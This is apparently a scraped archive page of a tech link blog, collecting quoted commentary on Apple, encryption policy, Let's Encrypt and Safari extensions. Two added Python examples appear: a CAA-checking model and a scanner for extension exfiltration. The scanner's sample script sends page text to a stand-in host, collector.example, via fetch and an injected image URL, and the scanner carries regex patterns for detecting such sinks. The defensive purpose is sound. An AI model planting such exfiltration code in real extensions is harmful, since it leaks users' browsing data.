This is a story about how the most sophisticated copyright filter in the world prevented us from explaining copyright law. It doesn’t involve TikTok dance moves or nuanced 90s remixes featuring AOC. No, it involves a debate at a law school conference over how and when one song can infringe the copyright of another and how exactly one proves in a courtroom if the accused song is “substantially similar” enough to be deemed illegal. In the end, because it was blocked by one of the music companies who owns the song, it also became a textbook study in how fair use still suffers online and what it takes to push back when a video is flagged. A copyright riddle wrapped up in an algorithmic enigma, symbolic of the many current content moderation dilemmas faced by online platforms today.

Previously:

my brother tried to stream a violin recital from his living room on Facebook Live and […]

Apparently this recording by this particular “artist” isn’t a song at all, but just an upload of that same washing machine jingle that’s been on YouTube for nearly a decade. So, some rando records his washing machine jingle, uploads it to YouTube, then registers it with ContentID, and goes around demonetizing other YouTube videos where the jingle plays. And, because of how ContentID is policed — or not —, none of this is caught by anyone at all.

Tuesday, March 10, 2020

Saving Audion Faces

Cabel Sasser:

Apple removed resource forks/PICT support in Catalina so we’re on the absolute edge of being able to rescue Audion faces from displaying easily ever again.

Michael Buckley:

[Audion faces are] an important part of Panic’s history that has been inaccessible to modern computing devices for well over a decade. Although they were cutting-edge technology when Audion launched 21 years ago, porting them to modern Web browsers was an involved process.

[…]

Les’s converter was mostly complete. It could already open resource files, extract images and their coordinates, and convert images from the PICT image format to PNG, an image format in wide use today. However, the code needed to be updated to run on modern versions of macOS. It used a few functions which have been removed from macOS since the converter was written.

[…]

However, HTML’s <canvas> element offers very little control over text rendering, and each Web browser draws the text differently. If you used Audion back in the day, the text on the page will not look exactly like you remember.

The second problem is that many Audion faces used custom fonts, and some of these fonts have been difficult to convert for the Web. Mac PostScript fonts also stored their font data in resource forks, and although there are many tools to convert these fonts to other formats, these tools fail to convert some of these fonts correctly.

See also: Audion & On on the new Panic podcast:

How did a fierce competition with a rival lead Steven Frank and Cabel Sasser to make a life-changing decision in a meeting with one of their biggest idols… and one of their arch nemeses? Plus: community and the cascading effects of the choices we make, 23 years later.

Previously:

Vanishing MacBook Pro Ports

Jason Snell:

This chart covers the era of 15-inch laptops, from the original Titanium PowerBook G4 in 2001, and also includes the 16-inch MacBook Pro (2019). I chose the last top-of-the-line 15-inch laptop to be released in a given year, and no, I didn’t include any bigger or smaller laptops.

Witness the rise and fall of Apple laptop ports, which peaked at 11 with the 2003-2005 MacBook Pros and has reached an all-time low the past four years with five[…]

Jernej Virag:

My new 13" Razer laptop has both TB3 USB-C ports and USB-A ports. Hard to describe how much less annoying it is to actually connect it to things compared to a Mac.

Nick Heer:

While neither an ExpressCard nor an SD Card slot is a port, per se, I think the removal of those connection options is also noteworthy.

As is the removal of the optical drive.

Google’s Software-based 3D Touch

Dieter Bohn:

But there was one line on Google’s support page for the update that caught my eye (emphasis mine): “In addition to long press, you can now firmly press to get more help from your apps more quickly.”

“Firmly press” sets off alarm bells because it sounds a lot like the iPhone’s 3D Touch, which enables different actions depending on how hard you press on the touchscreen.

[…]

But now, it seems that Google has done the same thing for the touchscreen that it does with the camera: use its software algorithms to make commodity parts do something special.

[…]

Essentially, this new feature lets you press harder to bring up long-press menus faster. In fact, Google’s documentation for Android’s Deep Press API explicitly says it should never do a new thing, it should only be a faster way to execute a long press.

Via Nick Heer:

As of last year, the hardware-based version of 3D Touch no longer exists; new iPhones do not have the component that registers touch pressure, and iPads never did. It’s kind of interesting that Google decided that now was an ideal time to replicate in software the ability to detect pressure — something which, as far as I can figure out, iOS does not do.

Previously:

Let’s Encrypt Vulnerability

Jim Salter (via Bruce Schneier):

On Leap Day, Let’s Encrypt announced that it had discovered a bug in its CAA (Certification Authority Authorization) code.

The bug opens up a window of time in which a certificate might be issued even if a CAA record in that domain’s DNS should prohibit it. As a result, Let’s Encrypt is erring on the side of security and safety rather than convenience and revoking any currently issued certificates it can’t be certain are legitimate[…]

See also: Let’s Encrypt.
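The check that went wrong here is CAA evaluation: before issuing, a CA must look up CAA records for every name on the order and confirm the record set authorises it, and, under the CA/Browser Forum Baseline Requirements, may rely on a CAA result for at most 8 hours before issuance. The following is an added example, not Let’s Encrypt’s Boulder code, modelling that check as RFC 8659 specifies it: walk from the name toward the root until a non-empty CAA RRset is found, honour `issuewild` over `issue` for wildcard requests, treat an empty issuer (`;`) as forbidding everyone, refuse on an unknown tag with the critical flag set, and re-evaluate each name on an order individually. The `ZONE` dictionary is a constructed stand-in for DNS answers so the script runs offline; `letsencrypt.org` is the identifier Let’s Encrypt actually uses in CAA records.

```python
"""Model of CAA (RFC 8659) evaluation as a CA would run it before issuing.

Added example; not Let's Encrypt's Boulder code. ZONE is a constructed
stand-in for DNS answers so the script runs offline.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass(frozen=True)
class CAA:
    flags: int   # bit 0x80 = "issuer critical"
    tag: str     # issue / issuewild / iodef / (unknown)
    value: str   # e.g. "letsencrypt.org; validationmethods=dns-01" or ";"


# Constructed zone: name -> CAA RRset. An empty list means "no CAA RRset
# here", so evaluation climbs to the parent, just as for a missing name.
ZONE = {
    "example.org.": [CAA(0, "issue", "letsencrypt.org"),
                     CAA(0, "issuewild", ";")],           # wildcards forbidden
    "blocked.example.org.": [CAA(0, "issue", ";")],       # nobody may issue
    "legacy.example.org.": [CAA(128, "futuretag", "x")],  # critical, unknown
    "sub.example.org.": [],
}

KNOWN_TAGS = {"issue", "issuewild", "iodef"}
CAA_MAX_AGE = timedelta(hours=8)  # Baseline Requirements: CAA result usable 8h


def relevant_rrset(zone, fqdn):
    """RFC 8659 s3: the first non-empty CAA RRset found walking from the
    name toward the root (CNAME/DNAME handling omitted for brevity)."""
    labels = fqdn.rstrip(".").split(".")
    for i in range(len(labels)):
        rrset = zone.get(".".join(labels[i:]) + ".")
        if rrset:
            return rrset
    return []


def issuance_allowed(zone, fqdn, ca_id, wildcard=False):
    """True if `ca_id` may issue for `fqdn` (or `*.fqdn` when wildcard)."""
    rrset = relevant_rrset(zone, fqdn)
    if not rrset:
        return True  # no CAA anywhere up the tree: no restriction
    # An unknown tag carrying the critical bit means "do not issue".
    if any(r.flags & 0x80 and r.tag.lower() not in KNOWN_TAGS for r in rrset):
        return False
    tag = "issue"
    if wildcard and any(r.tag.lower() == "issuewild" for r in rrset):
        tag = "issuewild"  # issuewild overrides issue for wildcard requests
    props = [r for r in rrset if r.tag.lower() == tag]
    if not props:
        return True  # only iodef etc. present: no issuance restriction
    # Issuer domain is the text before the first ';'; an empty issuer
    # (the value ";") authorises nobody at all.
    return any(p.value.split(";", 1)[0].strip().lower() == ca_id.lower()
               for p in props)


def recheck_order(zone, names, ca_id):
    """Re-run CAA for every name on an order and return those that must
    block issuance. Each name is evaluated on its own; `*.a.b` is checked
    against `a.b` with wildcard semantics."""
    blocked = []
    for name in names:
        wildcard = name.startswith("*.")
        base = name[2:] if wildcard else name
        if not issuance_allowed(zone, base, ca_id, wildcard):
            blocked.append(name)
    return blocked


def caa_result_stale(checked_at, now):
    """A CAA result older than CAA_MAX_AGE must not be relied on at issuance."""
    return now - checked_at > CAA_MAX_AGE


if __name__ == "__main__":
    order = ["example.org.", "*.example.org.", "www.sub.example.org.",
             "blocked.example.org."]
    print(recheck_order(ZONE, order, "letsencrypt.org"))
    t0 = datetime(2020, 2, 29, 0, 0, tzinfo=timezone.utc)
    print(caa_result_stale(t0, t0 + timedelta(hours=9)))
```

The design point is in `recheck_order`: the loop calls `issuance_allowed` once per name with that name’s own data, so a record that forbids `*.example.org.` or `blocked.example.org.` blocks the order even though `example.org.` itself authorises the CA. A recheck that evaluated a single name on behalf of the whole order would pass here and issue a certificate the DNS owner had prohibited.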

Previously:

Monday, March 9, 2020

Apple Changes iPhone Cleaning Guidelines

Juli Clover:

Apple today updated its support document on cleaning Apple products with new information that confirms it’s okay to use a 70 percent isopropyl alcohol wipe or Clorox Disinfecting Wipes for the purpose of cleaning germs from your devices.

Prior to now, Apple’s cleaning guidelines have recommended against all cleaners, warning that the chemicals have the potential to damage the oleophobic coating on iPhone and iPad displays. Apple still warns against aerosol sprays, ammonia, window cleaners, hydrogen peroxide, bleach, compressed air, and abrasives[…]

I’m not sure what to make of this. I followed the link, and it leads to a page that was last updated in September 2019 and still recommends only using water. It also omits the iPhone XR.

Joanna Stern:

Turns out, we’ve been living an iPhone-cleaning lie.

After years of being told we cannot—and should not—clean our phones with disinfecting wipes, Apple now says you can. My extensive testing over the last few days proves the same.

Was Apple just being overly cautious before (or didn’t test with anything else)? Or are the newer oleophobic coatings better?

I also wonder whether it is possible to accurately test this over just a few days.

Previously:

Update (2020-03-09): Tanner Bennett notes that if you add the ?mod=article_inline part to the first link, you get the same page but with an extra note in a box:

Is it OK to use a disinfectant on my Apple product?

Using a 70 percent isopropyl alcohol wipe or Clorox Disinfecting Wipes, you may gently wipe the hard, nonporous surfaces of your Apple product, such as the display, keyboard, or other exterior surfaces. Don’t use bleach. Avoid getting moisture in any opening, and don’t submerge your Apple product in any cleaning agents. Don’t use on fabric or leather surfaces.

Update (2020-03-27): Howard Oakley:

If the Coronavirus is going to die when left alone outside the body, why don’t we just leave surfaces alone and wait for that to happen? We can, and in many circumstances will do so, but that entails leaving possibly contaminated objects for several days, best at least a week, before anyone can touch them again. So in most circumstances, you’re going to want to disinfect things like keyboards, trackpads, mice, touchscreens, etc., rather than seal them away with big yellow-and-black warning signs attached.

Folding@home

Josh Centers:

If you’re looking for a new distributed computing project to join (calling Bob Lauterbach), the 20-year-old Folding@home project is still going strong. Folding@home is dedicated to “understanding protein folding, the diseases that result from protein misfolding and aggregation, and novel computational ways to develop new drugs in general.”

In addition to cancer, Alzheimer’s, Huntington’s, and Parkinson’s, Folding@home is tackling a disease that has been dominating the headlines: COVID-19. Your contributions could help researchers find a treatment.

Previously:

Update (2020-03-27): Dominik Wagner:

Fun Fact: I’m actually running Windows on an iMac to be able to contribute to the #COVID19 @foldingathome projects, as they are all GPU only right now and no GPU support on macOS currently.

Samsung vs. iPhone

Benjamin Mayo:

10 years ago today, Samsung made this slide deck detailing 126 things the iPhone OS did better than the original Samsung Galaxy S operating system.

Rene Ritchie:

The Galaxy Note 10 is here. I spoke all about it with Daniel Bader from Android Central, so be sure to check that video out if you haven’t already. Now, I want to talk about the feature from the Note 10 I’d love to see Apple bring to the iPhone […]

Juli Clover:

In our latest YouTube video, we go hands-on with the Note 10+ to check out what Samsung has added to try to compete with the iPhone lineup.

Previously:

Trying to Weaken Encryption Again

The New York Times:

Attorney General William Barr and his British and Australian counterparts are set to push Facebook for a back door to its end-to-end encryption on WhatsApp and other messaging platforms, which would give investigators access to now-secret communication

Matthew Green:

If there’s any surprise in the Barr letter, it’s not the government’s opposition to encryption. Rather, it’s the new reasoning that Barr provides to justify these concerns. In past episodes, law enforcement has called for the deployment of “exceptional access” mechanisms that would allow law enforcement access to plaintext data. As that term implies, such systems are designed to treat data access as the exception rather than the rule. They would need to be used only in rare circumstances, such as when a judge issued a warrant.

The Barr letter appears to call for something much more aggressive.

Rather than focusing on the need for exceptional access to plaintext, Barr focuses instead on the need for routine, automated scanning systems that can detect child sexual abuse imagery (or CSAI).

John Gruber:

They don’t use the word “backdoor” but that’s what they’re asking for. End-to-end encryption doesn’t allow for backdoors. So what they’re really asking is for Facebook not to use end-to-end encryption. And the only truly secure, truly private encryption for personal communication is end-to-end encryption. So, when you boil it all down and ignore the emotional pleas that would have you believe this is all about protecting children, what they’re really asking is for Facebook not to safeguard the security and privacy of the messaging of billions of people around the world.

Bruce Schneier:

In an extraordinary essay, the former FBI general counsel Jim Baker makes the case for strong encryption over government-mandated backdoors[…] Basically, he argues that the security value of strong encryption greatly outweighs the security value of encryption that can be bypassed.

Pete Williams (MacRumors):

The FBI is asking Apple Inc. to help unlock two iPhones that investigators think were owned by Mohammed Saeed Alshamrani, the man believed to have carried out the shooting attack that killed three people last month at Naval Air Station Pensacola, Florida.

Nick Heer:

As with the San Bernardino case, Apple says that it is cooperating with authorities. But, unlike that case, the FBI hasn’t yet tried to legally compel Apple into, for example, creating a special version of iOS that has no restrictions on passcode attempts. As with that case, it would set a troubling precedent that encryption should be weakened. So far, there is simply no practical or realistic way of doing so without breaking every user’s security.

John Gruber:

Honestly, I don’t think this has anything to do with the Pensacola shooter. I think this is part of a campaign to drum up public support for making true encryption illegal. And if it really is about the Pensacola shooter, the FBI’s leadership doesn’t understand how encryption works, which is disgraceful.

Nick Heer:

Twice now, the U.S. Department of Justice has pushed Apple to help decrypt iPhones involved in high-profile crimes. Twice, Apple has pushed back. And, twice, the popular press has framed these cases in terms that do not help their general-audience readers understand why Apple is refusing demands to cooperate; instead, using language that implicitly helps those who believe that our rights should be compromised to a lowest common denominator.

Juli Clover:

United States President Donald Trump this afternoon weighed in on a disagreement between Apple and the FBI, calling on Apple to “step up to the plate” and “help our great country” by unlocking the iPhones used by Florida shooter Mohammed Saeed Alshamrani.

Trump said that the U.S. is “helping Apple all of the time” but Apple refuses to “unlock” smartphones used by “killers, drug dealers and other violent criminal elements.”

Rene Ritchie:

So, what’s critical is to step back and really look at what’s being asked for here. No more secrets. The ability to get into not just a single criminal’s phone, but everybody’s phone. Yours and mine. And the ability for not just the FBI to get into it, but everybody. Foreign agencies and criminals.

John Gruber:

The big question remains unclear in all this coverage: did Apple refuse the DOJ’s request, or are they unable — technically — to fulfill the request? The DOJ continues to talk as though this is something Apple could do but refuses to.

Nick Heer:

To be clear, my iPhone still prompted for its passcode when the update had finished its installation process. This did not magically unlock my iPhone. It also doesn’t prove that passcode preferences could be changed without first entering the existing valid passcode.

But it did prove the existence of one channel where an iPhone could be forced to update to a compromised version of iOS. One that would be catastrophic in its implications for iPhones today, into the future, and for encrypted data in its entirety. It is possible; it is terrible.

David Sparks:

Apple sells into a lot of countries. Any one of them could require they install a back door as a condition of access to the market. Apple’s principles are on a collision course with a massive loss of income. Is it just a question of time before governmental regulation and market pressures make this period of time, where all citizens have relatively secured data and communications, only a temporary phase? I sure hope not.

Nick Heer:

Sparks is right: there will come a time that Apple will need to choose whether it will stand behind strong privacy and security, or if the monetary cost of doing so is simply too high.

Tim Hardwick (9to5Mac, Hacker News):

New questions have been raised about the FBI’s latest request that Apple break its iPhone encryption, after Forbes uncovered a search warrant strongly indicating that federal agents already have tools that can access data on Apple’s latest iPhone models.

William Gallagher:

Republican Senator Lindsey Graham is behind a draft bipartisan bill called the ‘Eliminating Abusive and Rampant Neglect of Interactive Technologies Act of 2019’ or EARN IT. Its stated aims are to “develop recommended best practices… regarding the prevention of online child exploitation.” However, the methods Graham proposes would effectively ban all end-to-end encryption.

Joe Rossignol:

FBI officials have still not managed to unlock a passcode-protected iPhone that investigators believe was owned by Mohammed Saeed Alshamrani, the perpetrator of a mass shooting at a Naval Air Station in Florida in December.

The disclosure was made by FBI director Christopher Wray at a House Judiciary Committee hearing today, according to Bloomberg. Wray told Rep. Matt Gaetz (R-FL) that the FBI is “currently engaged with Apple hoping to see if we can get better help from them so we can get access to that phone,” the report claims.

Tim Hardwick:

The director general of Britain’s Security Service is arguing for “exceptional access” to encrypted messages, in the ongoing battle between authorities and technology companies, reports The Guardian.

Matthew Green:

Yesterday a bipartisan group of U.S. Senators introduced a new bill called the EARN IT act. On its face, the bill seems like a bit of inside baseball having to do with legal liability for information service providers. In reality, it represents a sophisticated and direct governmental attack on the right of Americans to communicate privately.

I can’t stress how dangerous this bill is, though others have tried. In this post I’m going to try to do my best to explain why it scares me.

Previously:

Update (2020-03-27): Bruce Schneier:

Prepare for another attack on encryption in the U.S. The EARN-IT Act purports to be about protecting children from predation, but it's really about forcing the tech companies to break their encryption schemes[…]

Apple to Settle US iPhone Throttling Lawsuit

Benjamin Mayo (MacRumors, Hacker News):

Apple is set to pay up to $500 million to settle a United States lawsuit over the iPhone battery performance throttling debacle of 2018.

Via Reuters, Apple agreed to a preliminary settlement in legal documents filed on Friday. The company denied wrongdoing but said it settled to avoid lengthy court proceedings. The monetary suit is equivalent to $25 per impacted iPhone.

If you unnecessarily spent hundreds of dollars to get a new phone—because of a design flaw that made the battery not last very long and a lack of communication that obscured the reason your old phone was slow—you get less than the temporarily discounted cost of a new battery.

Jon Brodkin:

The judge in the case still has to decide whether the settlement is fair, reasonable, and adequate. A hearing is scheduled for April 3.

[…]

To identify people who are eligible for payments, the settlement says that “Apple will provide the Settlement Administrator with the email address of record on the Apple ID account of the members of the Settlement Class, as well as names, mailing addresses, and relevant iPhone serial numbers.” The settlement administrator would then contact those people via email or paper mail. Additionally, “A copy of the Class Notice, together with the Claim Form and various Court orders and other filings, will be posted and available for download on the Settlement Website. Finally, the Parties may jointly agree to provide additional notice with approval from the Court.”

Samuel Gibbs (Hacker News):

Apple and Samsung are being fined €10m and €5m respectively in Italy for the “planned obsolescence” of their smartphones.

An investigation launched in January by the nation’s competition authority found that certain smartphone software updates had a negative effect on the performance of the devices.

Believed to be the first ruling of its kind against smartphone manufacturers, the investigation followed accusations that operating system updates for older phones slowed them down, thereby encouraging the purchase of new phones.

Previously:

Update (2022-12-02): Juli Clover (in November 2020):

The investigation has now concluded, and Apple has opted to pay $113 million to settle the matter, reports The Washington Post. Apple has also agreed to be more transparent about similar changes to iOS devices in the future, providing more detail about battery health and power management.

See also: NPR, Hacker News.

Friday, March 6, 2020

iOS Default Apps and Competing With Built-in Apps

Charlie Sorrel:

In iPadOS and iOS 13, you can kinda replace the stock Apple apps on your iPhone or iPad. For instance, anytime you tap the Mail icon, Spark could launch instead. Or, and this is probably the most useful, when you tap the lock-screen shortcut for the Camera app, you could launch Halide instead.

[…]

Here’s how it works. You make a Shortcuts automation that is triggered when you open the stock Camera app. When triggered, it opens the camera app of your choice.

Mark Gurman:

The issue has become more prevalent as Apple’s selection of apps has grown. In 2007, the iPhone had 17 pre-installed apps. Today, there are 38. And since the App Store launched in 2008, Apple has never let consumers set a third-party app as a default option, unlike on Android, Windows, and Apple’s own macOS computer operating system. Android users can pick Firefox as their go-to browser relatively easily, for instance.

A House antitrust panel wrote to Apple recently to demand executive communications relating to iPhone default apps. The lawmakers want to learn about the company’s policies on whether iPhone users can set non-Apple apps as defaults in categories including web browsers, maps, email and music.

“This sounds like Microsoft in the 90s,” said David Reichenberg, an antitrust lawyer at Cozen O’Connor.

Microsoft did let you set a different default browser, and different browsers were allowed to provide their own rendering engines, unlike on iOS.

Joe Rossignol:

Apple plans to release a software update later this year that will make Siri more flexible with third-party messaging apps like WhatsApp, Skype, and Facebook Messenger, the company told Bloomberg’s Mark Gurman.

[…]

It will still not be possible to straight-up set third-party apps as default on an iPhone. Instead, the report claims Siri will decide which messaging app to use based on interactions with specific contacts.

Mark Gurman:

An Apple spokesman provided the following statement:

[…] In the few categories where Apple also has an app, we have many successful competitors and we’re proud that their success is responsible for almost 2 million U.S. jobs in a thriving multibillion dollar market for developers. Our North Star is always to create the best products for our customers and that is why iPhone has the highest customer satisfaction in the industry.

Apple-made apps that are pre-installed on iPhones represent only 0.00002% of the roughly 2 million apps in the App Store, the company also noted.

[…]

It offers developers free marketing in the App Store and on social media, gives personalized recommendations to users who might be interested in their apps, and provides advice from the Apple developer-relations team.

Michael Love:

These responses are somewhat infuriating.

Steve Troughton-Smith:

We all know Apple doesn’t play in the App Store on a level playing field; many people excuse this with “it’s their store, they can do what they want”, which I think is trash. If antitrust litigation forces Apple to do the right thing, so be it

If you statically analyze Apple’s App Store apps (like I’ve had to do for experimentation with marzipanify), you’ll find that almost none of them would pass App Review if submitted by an external developer. They get all kinds of private API access and special entitlements

Setting app defaults is just the start of the story; even as the default app, it will be hard to compete fairly with the special privileges Apple grants its own apps

The question is a totally legit one: does Apple compete fairly with apps on its App Store? All of us developers know the answer is ‘of course not’. Many users might know this too. Detractors attack the question instead of the facts behind it because that’s all you can do

Does Apple empower developers? Heck yes. Have they created entire new industries and millions of jobs? For sure. Is iOS a great platform to develop for? Absolutely! Two things can be true at the same time; Apple giveth, Apple competeth unfairly

As a developer, I’m afraid that even antitrust litigation will miss the forest for the trees, and only address setting default apps on iOS, which would be an easy token gesture for Apple to give and wouldn’t really address the underlying problem

I have literally had Apple reject an App Store app of mine (with a ‘never gonna happen’) only to introduce one a few months later with the same app name, icon and purpose 😂 (that was ‘Files’). Apple even gets to unfairly compete with not-yet-released apps

Yoav Weiss:

This happened to me too on watchOS. I submitted an app that displayed multiple swipeable white screens and acted as a flashlight on your wrist. Apple called and said “too many flashlight apps for iPhone”. Me: this is for ᴡᴀᴛᴄʜ. Apple: behold! watchOS 4 with flashlight!

Andrew Chidden:

Apple also loves picking favorites. One WWDC showcased our competitors with a critical feature previously removed from watchOS. Prior to WWDC Apple told us to pound sand when we asked about the feature, so we had already pivoted the team away.

I’m now at a company that Apple “likes”, and the difference is striking. We know about certain things well in advance, our app is shown on stage + Apple.com, and we don’t get blocked from the App Store for half the year.

Eric Lewis:

This is 100% true, I got away with some amazing stuff with my relationship with Apple. Including background location in a way beyond anything they’d ever allow.

David Barnard:

The problem I have is when Apple doesn’t allow 3rd party developers to compete even when that competition wouldn’t cause security or privacy issues.

The example I gave @markgurman on that was my @Timer app. I’ve begged Apple for the critical alerts entitlement so that my timers can compete with the system timer in alerting people even when the mute switch is on or volume turned down. I get so many confused support emails.

And as I complained earlier this summer, @LaunchCenterPro pioneered the use of NFC stickers for triggering shortcuts on iOS, but Shortcuts added NFC with special background access that 3rd party apps don’t get.

What’s ultimately best for iOS customers is a vibrant 3rd party developer community that’s allowed to better compete with 1st party apps AND Apple integrating some things into 1st party apps that just shouldn’t be allowed in 3rd party apps.

Mark Gurman (MacRumors):

The technology giant is discussing whether to let users choose third-party web browser and mail applications as their default options on Apple’s mobile devices, replacing the company’s Safari browser and Mail app, according to people familiar with the matter.

John Gruber:

Users have been clamoring for this ever since the App Store opened. I get why Apple has been cautious about allowing this, but at this point it’s overdue. There are third-party email clients and web browsers that are really good — Apple should celebrate that fact.

[…]

Siri does support third-party apps — you just have to specify them by name: “Hey Siri, play some Pearl Jam from Spotify”. It makes sense that this should be a setting too — if you’re a Spotify user it’s a bit ridiculous that you’re currently required to tack on “from Spotify” with every single request.

Benjamin Mayo:

That small change would cover the use cases of what most people think up when they say they want the ability to set default apps. With such a trivial amount of work involved, that is probably what Apple will do. Competition regulators would probably be appeased by it. However, if you were actually trying to design a system that treated third-party and first-party apps as equals, there’s a lot further to go.

Apple’s stock apps have a lot of privileged system behaviours. For instance, Mail gets to poll the server for new emails on a regular schedule. You can go into Settings and set to check for new mail as often as once every fifteen minutes. Third-party email apps can only use the sanctioned background refresh APIs, which throttle updates significantly and do not have any guarantees of regularity. This means the majority of third-party email apps have to be backed by a cloud service that checks inboxes and sends new mail push notifications to the device. Apple Mail also has deep and granular options for notification preferences; a user can choose how and where notifications appear on a per-mailbox basis, and do things like let messages from VIP contacts hit the lock screen whilst sending everything else silently to Notification Centre. No App Store app has the capability to do that stuff.

Jason Snell:

The Files app never wants to let you open a bunch of file types directly in an external editor. PDFs and audio and video files? Forget it—those open in Quick Look if you tap on them or tap Open in the Get Info view (which is the same view that appears if you tap on a file when you’re in column view). To open these files, you need to choose Share and then send them to another app.

For other file types, you can indeed set a default—so long as the app in question supports opening files directly. To do this, you tap and hold on a file, then choose Share from the resulting contextual menu. From the resulting share sheet, choose an app from the list of apps at the very top, or swipe all the way to the end of the list and tap More to see even more options. What you want is an option to “Open in [name of app].”

John Gruber:

This whole thing about being able to map a default handler for file types — but not PDFs or audio or video — is bananas. Bananas that even Jason Snell didn’t know about it, bananas that PDFs and AV files are special-case locked to Quick View, bananas all around.

Jared Sorge:

If one of the benefits of setting your default browser to (let’s say) Chrome is that you have access to all the Chrome things all the time, would it be jarring for a user to see Safari inside of their Twitter app when they tap on a link? Would Apple provide some kind of hook inside of SFSafariViewController to actually show the content of a third-party app like this? If I’ve purposefully gone and set Chrome as my default browser then I sure don’t want Safari ever getting in my way.

There’s also similar code around MFMailComposeViewController for sending emails in apps (I use that in Scorebook) as well as MFMessageComposeViewController for sending iMessage or SMS messages. Would they allow users to pick their email or message client and slide up those experiences as well?

Previously:

Buy-Back Programs for iPhones

Jenna Tsui:

Many Apple users know Cult of Mac as a tech news site, but fewer think of it as a site that will buy back Apple gear. In 2015, however, the site launched the Cult of Mac Buy-Back Program, which claims to give people more money for their Apple products than other, less-specific sites like Gazelle. You don’t have to worry about Cult of Mac publisher Leander Kahney inspecting old iPhones himself; the program is white-labeled through MyPhones Unlimited, an Arkansas-based recycler.

[…]

Simply Mac is an independent Apple retailer with locations throughout the United States. Its Simple Trade program is another option for those who prefer to trade in an iPhone in person but don’t have an Apple Store near them. When taking this approach, you receive your buy-back quote after a Simply Mac representative evaluates the device in person. Unfortunately, trade-ins are accepted only in Simply Mac stores.

[…]

However, not all iPhones are fed to Daisy. Apple clarified that Daisy works only with select used iPhones from the company’s trade-in program, as well as those sourced from Best Buy’s recycling initiative in the United States and KPN stores in the Netherlands. […] If it seems that Apple isn’t being entirely forthcoming, the other two companies are even less specific about what happens to old phones. Both Cult of Mac and Simply Mac sell refurbished phones when possible, but neither company says where.

The Gazelle prices are always a bit lower than I’d like, but they make the process very easy.

Previously:

The Decimation of Safari Extensions

Jeff Johnson:

As a result of the change in format from safariextz to app, Safari extensions have been decimated. There are significantly fewer Safari extensions available. The developer program membership cost factor is obvious, so I won’t spend any more time discussing that. I believe that the biggest barrier now to creating Safari extensions is not money but developer expertise. To create an extension for Firefox, Chrome, or any browser based on Chromium — Microsoft Edge, Brave, Opera, Vivaldi — you just need to know JavaScript, CSS, and HTML. In other words, almost any web developer in the world can create an extension for almost any web browser in the world. All these worlds are yours… except Safari! Attempt no landing there. Safari is unique, unprecedented in its extension requirements. Safari extension developers still have to know web development, but they also have to know native Mac development.

[…]

If you’re wondering why your favorite old Safari extension hasn’t been ported to a new Safari app extension, the reason isn’t necessarily just lack of native Mac development expertise by the developer. Even though an app extension still uses JavaScript and CSS like a safariextz, the new API is not the same as the old API. Developers can’t simply take the old JavaScript and stick it inside a Mac app bundle, that’s not how it works. The new SafariServices API is simply not as powerful as the old Safari JavaScript API. There are things an extension could do in the past that it can no longer do.

Brian Krebs (Hacker News):

The incident is a reminder that browser extensions — however useful or fun they may seem when you install them — typically have a great deal of power and can effectively read and/or write all data in your browsing sessions. And as we’ll see, it’s not uncommon for extension makers to sell or lease their user base to shady advertising firms, or in some cases abandon them to outright cybercriminals.

As far as I know, the new Safari extensions model doesn’t fix this problem. I don’t want to run any extensions that have access to both the full webpage contents and the ability to send my information to a server. The extension runs in its own process, and thus I get a Little Snitch alert if it tries to make a network connection. But the extension could also modify the page content to make network connections on its behalf, and then this would not be caught by Little Snitch. So it still seems like the only way to be sure an extension is safe is to read its JavaScript source.
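The two paths described above (the extension’s own process calling out, versus the extension injecting something into the page so that the web content process makes the request) can be triaged from the extension’s JavaScript before you install it. The following is an added example of mine, not code from Jeff Johnson, Brian Krebs, or any real extension: a small Python pass that flags page-reading sources and both kinds of network sink over a constructed sample content script. The sample, the hostname `collector.example`, and the category names are mine.

```python
import re

# Constructed sample standing in for the content script of a hypothetical
# Safari app extension. It is not taken from any real extension.
SAMPLE_EXTENSION_JS = """\
// grab everything the user can see on the page
const text = document.body.innerText;
// path 1: the extension's own process talks to the network
fetch("https://collector.example/ingest", {method: "POST", body: text});
// path 2: make the page do it instead; the request then comes from the
// browser's web content process, so a per-process firewall prompt for the
// extension never fires
const img = document.createElement("img");
img.src = "https://collector.example/pixel?d=" + encodeURIComponent(text);
document.body.appendChild(img);
// harmless
console.log("loaded", text.length);
"""

# (regex, category, description). Categories:
#   reads-page: sources that expose page content to the extension
#   direct:     the extension's own process issues the request
#   via-page:   the injected DOM makes the web content process issue it,
#               which is the path a per-process network monitor misses
SINKS = [
    (r"\b(innerText|textContent|outerHTML|document\.cookie|localStorage)\b",
     "reads-page", "reads page content or storage"),
    (r"\bfetch\s*\(", "direct", "fetch()"),
    (r"\bXMLHttpRequest\b", "direct", "XMLHttpRequest"),
    (r"\bnavigator\.sendBeacon\s*\(", "direct", "sendBeacon()"),
    (r"\bnew\s+WebSocket\s*\(", "direct", "WebSocket"),
    (r"\.src\s*=", "via-page", "assignment to .src (img/script/iframe)"),
    (r"createElement\s*\(\s*['\"](img|script|iframe|link)['\"]",
     "via-page", "creates an element that fetches a URL"),
    (r"\.innerHTML\s*\+?=", "via-page", "innerHTML injection"),
    (r"\blocation\s*(\.href\s*)?=[^=]|location\.(assign|replace)\s*\(",
     "via-page", "navigation"),
    (r"\.submit\s*\(", "via-page", "form submission"),
]
CATEGORIES = ("reads-page", "direct", "via-page")


def find_network_sinks(source):
    """Return (line_no, category, description, line) for every sink hit.
    Toy heuristic: skips // line comments only, and obfuscated code
    (e.g. window["fe" + "tch"]) will slip past it; it is a triage aid for
    deciding what to read closely, not a proof of safety."""
    hits = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        code = line.strip()
        if code.startswith("//"):
            continue
        for pattern, category, description in SINKS:
            if re.search(pattern, code):
                hits.append((line_no, category, description, code))
    return hits


def summarize(source):
    """Line numbers per category; an extension with both a reads-page hit
    and any network sink can exfiltrate what you browse."""
    hits = find_network_sinks(source)
    return {c: sorted({h[0] for h in hits if h[1] == c}) for c in CATEGORIES}


def can_exfiltrate(source):
    s = summarize(source)
    return bool(s["reads-page"]) and bool(s["direct"] or s["via-page"])


if __name__ == "__main__":
    for hit in find_network_sinks(SAMPLE_EXTENSION_JS):
        print("%3d %-10s %-40s %s" % hit)
    print("can exfiltrate:", can_exfiltrate(SAMPLE_EXTENSION_JS))
```

Run it against the unpacked `.js` files inside an extension bundle (the `Contents/Resources` folder of the app extension). Anything that lands in both a `reads-page` and a `via-page` bucket is exactly the case where a per-process firewall alert on the extension tells you nothing, so those are the lines to read first.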

Previously:

The Apollo Guidance Computer

Wojtek Pietrusiewicz:

